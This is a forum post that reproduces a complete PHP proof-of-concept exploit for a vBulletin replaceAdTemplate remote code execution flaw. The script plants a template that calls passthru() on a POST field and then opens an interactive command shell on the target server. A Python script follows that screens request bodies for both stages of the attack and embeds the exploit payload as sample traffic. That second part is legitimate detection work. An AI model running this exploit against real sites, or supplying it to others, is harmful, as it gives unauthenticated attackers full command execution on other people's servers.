vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability

pianoxltd (User, registered 24.09.2024)

PHP:
<?php

/*
    -----------------------------------------------------------------
    vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability
    -----------------------------------------------------------------
    
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.vbulletin.com
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] Technical Writeup:

    https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+---------------------------------------------------------------------+";
print "\n| vBulletin (replaceAdTemplate) Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
    print "\nUsage......: php $argv[0] <URL>\n";
    print "\nExample....: php $argv[0] http://localhost/vb/";
    print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
    die();
}

// Stage 1: store a template through the ad API. The template body is a
// vb:if conditional whose condition is evaluated as PHP when rendered;
// it calls passthru() on whatever arrives in the "cmd" POST field.
$params = [
        "routestring" => "ajax/api/ad/replaceAdTemplate",
        "styleid" => "1",
        "location" => "rce",
        "template" => "<vb:if condition='\"passthru\"(\$_POST[\"cmd\"])'></vb:if>"
];

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

// A bare "null" JSON response means the template was stored.
if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n");

// Stage 2: render the stored template (location "rce" => ad_rce) with a command.
$params = ["routestring" => "ajax/render/ad_rce"];

while (1)
{
    print "\nvBulletin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $params["cmd"] = $cmd;
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
 


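The two requests the PoC sends are easy to recognise on the wire once you know the chain: an unauthenticated POST whose routestring is ajax/api/ad/replaceAdTemplate with a vb:if conditional in the template field, followed by POSTs to ajax/render/ad_<location> carrying a cmd parameter. The script below is an added example (not part of the original post or of EgiX's code) that screens raw form-encoded request bodies for both stages; the route names and payload shape come from the PoC above, while the sample traffic, the finding strings and the `authenticated` flag are constructed assumptions for illustration.

```python
"""Request-body screen for the replaceAdTemplate exploit chain (added example)."""
import re
from urllib.parse import parse_qs, urlencode

# Stage 1 of the chain: the ad API route that stores a caller-supplied template.
TEMPLATE_ROUTE = "ajax/api/ad/replaceadtemplate"
# Stage 2: any ad render route; the PoC uses location "rce", hence ad_rce.
RENDER_ROUTE = re.compile(r"^ajax/render/ad_", re.I)

# Markers of code execution inside a submitted template body.  The PoC's
# payload is a vb:if conditional that calls a string literal as a function
# ("passthru"(...)) and reads the command from $_POST at render time.
SUSPICIOUS_TEMPLATE = [
    (re.compile(r"<vb:if\s+condition=", re.I), "vb:if conditional in ad template"),
    (re.compile(r"""["'][A-Za-z_]\w*["']\s*\("""), "string literal used as callable"),
    (re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"), "superglobal read in template"),
]


def classify_request(method, body, authenticated=False):
    """Return a list of findings for one request.

    `body` is the raw application/x-www-form-urlencoded body.  `authenticated`
    is an assumption: the caller decides whether the request carried a valid
    admin session (this example does not inspect cookies).
    """
    findings = []
    if method.upper() != "POST":
        return findings
    params = parse_qs(body, keep_blank_values=True)
    route = params.get("routestring", [""])[0].strip("/").lower()
    if route == TEMPLATE_ROUTE:
        if not authenticated:
            findings.append("unauthenticated call to replaceAdTemplate")
        template = params.get("template", [""])[0]
        findings.extend(why for pat, why in SUSPICIOUS_TEMPLATE if pat.search(template))
    elif RENDER_ROUTE.match(route) and "cmd" in params:
        findings.append("ad render request carrying a cmd parameter")
    return findings


# Constructed sample traffic: the PoC's two requests plus two benign ones.
SAMPLES = {
    "plant": ("POST", urlencode({
        "routestring": "ajax/api/ad/replaceAdTemplate",
        "styleid": "1",
        "location": "rce",
        "template": "<vb:if condition='\"passthru\"($_POST[\"cmd\"])'></vb:if>",
    })),
    "trigger": ("POST", urlencode({"routestring": "ajax/render/ad_rce", "cmd": "id"})),
    "benign_render": ("POST", urlencode({"routestring": "ajax/render/ad_header", "styleid": "1"})),
    "benign_get": ("GET", urlencode({"routestring": "forum"})),
}


def scan_samples():
    """Classify every constructed sample; returns {name: findings}."""
    return {name: classify_request(m, b) for name, (m, b) in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name:14s} {findings or 'clean'}")
```

Note that routestring travels in the POST body, not the URL, so a plain access-log grep will not see it; this check has to run where the body is available (a WAF, a reverse proxy with body inspection, or a PHP front controller). Even with a valid admin session the template-content findings still fire, which is the useful signal: an ad template has no business containing a conditional that calls functions or reads request input.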